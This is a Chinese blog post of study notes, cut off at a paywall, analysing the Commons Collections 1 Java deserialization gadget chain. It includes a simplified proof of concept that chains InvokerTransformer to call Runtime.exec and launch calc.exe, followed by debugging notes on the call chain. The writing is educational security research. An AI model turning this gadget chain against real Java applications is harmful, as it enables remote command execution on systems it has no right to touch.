p牛java安全漫谈学习笔记(3)_CommonsCollections1(cc1)分析

已于 2022-04-06 13:16:30 修改
阅读量4.1k 收藏 1
点赞数
分类专栏: java安全 文章标签: 网络安全
于 2022-04-06 12:28:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35976649/article/details/123986988
版权

文章目录

cc1链(jdk6)
简化cc1-仿

使用p牛的简化cc1进行分析:

package ysoserial.payloads;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

public class cc1 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.getRuntime()),
            new InvokerTransformer("exec", new Class[]{String.class},
                new Object[]
                    {"C:\\Windows\\System32\\calc.exe"}),
        };
        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
        outerMap.put("test", "xxxx");
    }
}

下断点进行debug:

请添加图片描述

一路f7发现漏洞点,excute确认漏洞所在

请添加图片描述

而此时的数据为字节流,于是反溯,可查看调用链:

请添加图片描述

TransformedMap.decorate用于把keyTransformer,valueTransformer定义进innerMap

Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);

keyTransformer,valueTransformer是继承了Transformer接口,用于处理新元素。

回到main中,定义了transformers

new Transformer[]{new ConstantTransformer(Runtime.getRuntime()),new InvokerTransformer("exec", new Class[]{String.class}, new Obj
最低0.47元/天 解锁文章
error_404_1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pjava安全漫谈学习笔记(2)_反序列化与urldns链(基础)
qq_35976649的博客
04-06 4301
关于反序列化 ysoserial下载分析地址:https://github.com/frohoff/ysoserial php反序列化主要是魔术方法,与java反序列化类似,主要是把对象进行json或者xml的序列化和反序列化。 php主要是可以控制对象的属性利用控制的对象的属性在后续代码中进行危险操作 java的话是因为很多反序列化的代码是由开发者进行开发的,再加上java的应用十分广泛,所以java的反序列化攻击面为最广的。 python的话p只提了一嘴,大致意思就是python反序列化是在执行基于栈
pjava安全漫谈学习笔记(1)_反射与RMI(基础)
qq_35976649的博客
04-06 4140
关于反射 获取类的⽅方法: forName 实例例化类对象的⽅方法: newInstance 获取函数的⽅方法: getMethod 执⾏行行函数的⽅方法: invoke public class TrainPrint { { System.out.printf("Empty block initial %s\n", this.getClass()); } static { System.out.printf("Static initial %s\n", TrainPrint.class); } publ
JavaThings:共享与Java相关的东西-Java安全漫谈笔记相关内容
02-06
JavaThings-Java安全漫谈笔记相关 《 Java安全漫谈》是我在写的一点Java学习相关的随笔,不是很严谨,也不是啥高科技。这个存储库主要是记录并整理一下,附加一些代码。 Java安全漫谈目录 人口统计 字节码: 远程字节码加载: 系统默认的defineClass加载字节码演示: 使用TemplatesImpl加载字节码演示: 使用BCEL加载字节码: 反序列化: 最简单的Transformer演示: 我简化的 ,更方便大家理解 利用TemplatesImpl构造的Transformer演示: 无InvokerTransformer的Transformer演示: 我
Java安全入门
Yb_140的博客
10-14 1303
Java安全入门
JAVA安全漫谈1-8笔记
wfz2333的博客
04-06 1056
classloader就是java的类加载器,告诉虚拟机如何加载这个类。默认情况下根据类名来加载类,类名必须是完整路径{}括号里的是初始化块,这里面的代码在创建java对象时执行,而且在构造器之前执行!其实初始化块就是构造器的补充,初始化快是不能接收任何参数的,定义的一些所有对象共有的属性、方法等内容时就可以用初始化块了初始化!好处是可以提高初始化块的复用,提高整个应用的可维护性。
Java安全漫谈 - 02.反射篇(2)1
08-03
不过,我们有时候在写漏洞利用方法的时候,会发现使用 newInstance 总是不成功,这时候原因可能是:1. 你使用的类没有无参构造函数2. 你使用的类构造函
JAVA安全JAVA服务器安全漫谈
swordheart的博客
04-25 972
0x00 前言 本文主要针对JAVA服务器常见的危害较大的安全问题的成因与防护进行分析,主要为了交流和抛砖引玉。 0x01 任意文件下载 示例 以下为任意文件下载漏洞的示例。 DownloadAction为用于下载文件的servlet。 1 2 3 4 5 6 7 8 9 10 11 12 13 <code>#!html <servlet>
Java安全漫谈 - 06.RMI篇(3)
离别歌
10-14 930
这是代码审计知识星球中Java安全的第六篇文章上一篇我们详细说了如何利用codebase来加载远程类,在RMI服务端执行任意代码。那么,从原理上来讲,codebase究竟是如何传递进而被...
Java安全漫谈 - 05.RMI篇(2)1
08-03
原因是,通常我们在新建一个RMI Registry的时候,都会直接绑定一个对象在上面,也就是说我们示例代码中的Server其实包含了Registry和Serve
Java安全漫谈 - 03.反射篇(3)1
08-03
对于可变长参数,Java其实在编译的时候会编译成一个数组,也就是说,如下这两种写法在底层是等价的(也就不能重载):也由此,如果我们有一个数组,想传给hello函
P神-Java安全漫谈
最新发布
04-20
Java安全是指在Java编程和应用开发过程中采取的一系列措施,旨在保护Java应用程序、系统和数据免受恶意攻击、数据泄露和其他安全威胁的影响。Java安全主要涉及以下几个方面: 代码安全性:Java提供了强大的安全机制...
Java安全漫谈 - 01.反射篇(1)1
08-03
Java安全漫谈 - 01.反射篇(1)1
CC1-T1:编译器构造学科的第一项工作1
05-16
编译器构造学科的第一项工作1 设定值: 1.克隆存储库 通过Intellij,单击通过版本控制导出 选择以从外部媒体导入设置。 2. Maven 右键单击pom.xml文件 选择“导入行家”(类似的东西) 3. ANTLR 转到设置>插件>安装JetBrains插件 找到ANTLR v4,按安装 重新启动Intellij 4.构建/运行 转到运行>编辑配置 在+单击“应用程序” 在“主类”字段中查找类似“ t1.Corrigir”的内容
Java安全漫谈 - 07.反序列化篇(1)1
08-03
但首先要理解的是,“反序列化漏洞”是对一类漏洞的泛指,而不是专指某种反序列化方法导致的漏洞,比如Jackson反序列化漏洞和Java readObject造成的
Java安全学习笔记(二)
qq_36410265的博客
06-20 411
最近在看pJava安全漫谈反序列化篇,详细分析CommonsCollections 这条链。​ jdk 版本
Java安全第一篇 | 反射看这一篇就够了
weixin_48202759的博客
03-21 3565
什么是反射? 文章首发个人公众号 《小艾搞安全Java安全可以从反序列化漏洞说起,反序列化漏洞又可以从反射说起。反射是⼤多数语⾔⾥都必不可少的组成部分,对象可以通过反射获取他的类,类可以通过反射拿到所有⽅法(包括私有),拿到的⽅法可以调⽤,总之通过“反射”,我们可以将Java这种静态语⾔附加上动态特性。可能说完这一两句话大家还是不知道反射是个啥玩意,现在为了让大家容易理解,先为大家提出一个需求,通过这个需要来引出反射。需求如下: 根据配置文件re.properties指定信息,创建对象并调用方法。 cl
安全角度谈Java反射机制--前章
Summer's blog
05-13 6580
安全角度谈Java反射机制第二章,从代码执行角度剖析Java反射机制。
安全角度谈Java反射机制--序章
Summer's blog
05-13 4421
安全角度谈Java反射机制第一篇,一共三篇由浅入深,一点点剖析Java的反射机制。
Java 安全研究初探
有价值炮灰
04-03 239
Java 安全,通常指代的是 Java Web 安全。在刚开始学习的一段时间里,面对众多的框架和名词,比如 Spring、Weblogic、EJB、AKB,等等,总感觉狗啃泰山无从下嘴。于是就有了这篇文章,旨在记录学习过程中遇到的所有问题,希望也能对像我一样的初学者有所帮助。
java安全漫谈pdf
01-29
Java安全漫谈是一本关于Java安全的书籍,深入探讨了Java应用程序在网络环境中的安全性和相关的安全漏洞。该书内容涵盖了Java安全基础、Java虚拟机的安全机制、Java安全管理、Java安全开发等方面的知识。 首先,Java...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值